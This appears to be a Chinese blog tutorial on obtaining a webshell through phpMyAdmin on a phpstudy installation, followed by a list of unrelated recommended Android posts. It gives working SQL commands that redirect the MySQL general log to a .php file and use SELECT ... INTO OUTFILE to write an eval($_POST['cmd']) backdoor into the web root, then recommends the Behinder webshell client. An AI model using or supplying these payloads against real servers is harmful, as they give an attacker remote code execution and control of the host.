常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码,在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on,以及www下的php文件

然后去select语句

复制代码
select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

复制代码
select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

复制代码
C:\phpstudy_pro\WWW\222.php

3.写入webshell

复制代码
select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧!

相关推荐
雨白6 小时前
C 语言基础:结构体、联合体与枚举
android
阿巴斯甜7 小时前
Android 代码混淆
android
apihz9 小时前
台风实时与历史详情查询免费 API 接口完整教程
android·开发语言·tcp/ip·dubbo·台风·天气预报
浪客川10 小时前
AOSP源码隐藏状态栏
android·aosp
没有了遇见10 小时前
AI Agent 是什么?—— 一文理解 LLM、Memory、Skills、Tools、MCP、Workflow,Context
android·前端·程序员
御坂嘀喵11 小时前
Speed Tools:一套低侵入的 Android 插件化 + 动态换肤 + 字体切换框架
android·gitee
浮江雾11 小时前
Flutter第三节----Dart中的数据类型
android·开发语言·学习·flutter·入门·函数
风和先行11 小时前
Android 数据库相关学习总结
android·数据库·学习
杉氧12 小时前
Compose 渲染内核 (3):Slot Table 与 Gap Buffer —— 极速重组的数学艺术
android·架构·android jetpack
AFinalStone12 小时前
Android 7系统网络(五)Framework层(上)—ConnectivityService核心机制
android·网络